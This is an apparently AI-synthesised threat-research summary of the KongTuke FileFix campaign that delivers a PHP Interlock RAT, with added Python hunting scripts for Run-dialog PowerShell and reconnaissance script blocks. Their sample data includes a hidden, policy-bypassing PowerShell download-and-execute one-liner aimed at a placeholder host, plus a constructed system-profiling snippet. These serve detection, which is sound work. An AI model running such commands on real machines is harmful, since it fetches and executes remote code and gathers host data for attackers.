VYPR
research · Published Jul 14, 2025 · Updated May 20, 2026 · 1 source

KongTuke FileFix Leads to New Interlock RAT Variant

Researchers identified a new PHP-based variant of the Interlock ransomware group's RAT, a shift from the JavaScript-based NodeSnake, which has been used in widespread attacks since May 2025.

Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group's remote access trojan (RAT). This new malware, a shift from the previously identified JavaScript-based Interlock RAT (aka NodeSnake), uses PHP and is being used in a widespread campaign.

Since May 2025, activity related to the Interlock RAT has been observed in connection with the LandUpdate808 (aka KongTuke) web-inject threat clusters. The campaign begins with compromised websites injected with a single-line script hidden in the page's HTML, often unbeknownst to site owners or visitors.

The linked JavaScript applies heavy IP filtering before serving the payload. The page first prompts the user to click a captcha to “Verify you are human”, then shows “Verification steps” instructing them to open the Run dialog and paste in the clipboard contents. If the user pastes and runs the command, it executes a PowerShell script that eventually leads to the Interlock RAT.

Proofpoint researchers have observed both the Node.js-based and the PHP-based Interlock RAT variants; the PHP-based variant was first spotted in June 2025 campaigns. The DFIR Report researchers have recently seen the same KongTuke web-inject transitioning to a FileFix variant.

This updated delivery mechanism has been observed deploying the PHP variant of the Interlock RAT, which in certain cases has then led to the deployment of the Node.js variant. The PHP variant is more resilient and loads its config file from a non-standard location.
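One way to hunt for the delivery chain described above (a pasted one-liner run from the Run dialog that launches PowerShell) is to look at process lineage and command-line content together. The following is an added example, not code from The DFIR Report, Proofpoint or the campaign itself. It assumes process-creation telemetry shaped like Sysmon Event ID 1 (`Image`, `ParentImage`, `CommandLine`); the indicator set and the sample events are constructed for illustration.

```python
"""Hunting logic for Run-dialog (Win+R) launched PowerShell.

Added example; field names, indicators and sample events are assumptions,
not telemetry from the page. The rule fires only when PowerShell was spawned
by explorer.exe (the parent of a Run-dialog command) AND the command line
shows at least two fetch-and-execute style traits, so that an admin who
types a short command into Run does not trip it.
"""
import re

# Traits typical of a pasted one-liner (assumed indicator set).
SUSPICIOUS_ARGS = [
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"-e(p|xecutionpolicy)?\s+bypass", re.I),
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I),
    re.compile(r"https?://", re.I),
]

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_process_event(event: dict) -> dict:
    """Return {'alert': bool, 'reasons': [...]} for one process-creation event."""
    reasons = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in POWERSHELL_IMAGES:
        return {"alert": False, "reasons": reasons}
    # Run-dialog commands are children of explorer.exe, an unusual parent
    # for scripted, non-interactive PowerShell.
    if parent == "explorer.exe":
        reasons.append("powershell spawned by explorer.exe (Run dialog lineage)")
    for pat in SUSPICIOUS_ARGS:
        if pat.search(cmdline):
            reasons.append(f"command line matches {pat.pattern!r}")
    # Lineage plus at least two content indicators.
    alert = parent == "explorer.exe" and len(reasons) >= 3
    return {"alert": alert, "reasons": reasons}


def hunt(events):
    """Return the ProcessIds of events that should be alerted on."""
    return [e["ProcessId"] for e in events if assess_process_event(e)["alert"]]


# Constructed sample events (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {"ProcessId": 101,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"'},
    {"ProcessId": 102,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -c Get-Service"},
    {"ProcessId": 103,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"ProcessId": 104,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["ProcessId"], assess_process_event(e))
```

On a real estate the lineage check can be corroborated from the `RunMRU` registry key, which records what was typed into the Run dialog, and the thresholds here are a starting point to tune against your own baseline of explorer-launched PowerShell.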

Upon execution, the Interlock RAT immediately performs automated reconnaissance of the compromised system. It uses a series of PowerShell commands to gather and exfiltrate a comprehensive system profile as JSON data, including system specifications, running processes, services, drives, and network neighbors. The malware also checks its own privilege level.
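The reconnaissance step above has a recognisable shape in PowerShell Script Block Logging (Event ID 4104): several inventory categories collected in one block and serialised to JSON. The following scorer is an added example, not code from The DFIR Report or Proofpoint, and the cmdlets it looks for are assumptions; the page names only the categories collected (system specifications, processes, services, drives, network neighbours, a privilege check), not the exact commands.

```python
"""Score PowerShell script-block text for profile-and-exfiltrate reconnaissance.

Added example. The cmdlet/WMI-class indicators per category and the sample
blocks are assumptions for illustration, not strings from the actual RAT.
"""
import re

# One indicator pattern per category the page says the RAT collects.
RECON_INDICATORS = {
    "system_info": re.compile(r"Get-ComputerInfo|Win32_OperatingSystem|Win32_ComputerSystem", re.I),
    "processes": re.compile(r"\bGet-Process\b|Win32_Process", re.I),
    "services": re.compile(r"\bGet-Service\b|Win32_Service", re.I),
    "drives": re.compile(r"\bGet-PSDrive\b|Win32_LogicalDisk|Get-Volume", re.I),
    "network_neighbors": re.compile(r"\bGet-NetNeighbor\b|\barp\b", re.I),
    "privilege_check": re.compile(r"WindowsIdentity\]::GetCurrent|IsInRole|WindowsBuiltInRole", re.I),
}
JSON_SERIALISE = re.compile(r"ConvertTo-Json", re.I)


def score_script_block(text: str) -> dict:
    """Report which recon categories appear and whether output is JSON-serialised."""
    categories = [name for name, pat in RECON_INDICATORS.items() if pat.search(text)]
    to_json = bool(JSON_SERIALISE.search(text))
    # Three or more categories bundled with JSON output is the profiling
    # shape; a lone Get-Service from an administrator is not.
    return {"categories": categories, "to_json": to_json,
            "suspicious": to_json and len(categories) >= 3}


# Constructed script-block texts (not samples of the real malware).
SAMPLE_BLOCKS = {
    "profile": (
        "$p=@{os=Get-CimInstance Win32_OperatingSystem;"
        "procs=Get-Process|Select Name,Id;svc=Get-Service;"
        "drives=Get-PSDrive -PSProvider FileSystem;"
        "nbrs=Get-NetNeighbor;"
        "admin=([Security.Principal.WindowsPrincipal]"
        "[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole("
        "[Security.Principal.WindowsBuiltInRole]::Administrator)};"
        "$p|ConvertTo-Json -Depth 3"
    ),
    "admin_check": "Get-Service -Name Spooler | Select Status",
}

if __name__ == "__main__":
    for name, block in SAMPLE_BLOCKS.items():
        print(name, score_script_block(block))
```

Pairing a hit from this scorer with a subsequent outbound connection from the same PowerShell process gives the exfiltration half of the behaviour; on its own the scorer is a triage aid, since legitimate inventory scripts can produce the same categories.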

The execution chain shows strong evidence of an interactive session, with hands-on keyboard discovery commands observed, including Active Directory queries for computers and users. The campaign highlights the evolving tactics of the Interlock ransomware group, which continues to refine its toolset to evade detection and maximize impact.

Synthesized by Vypr AI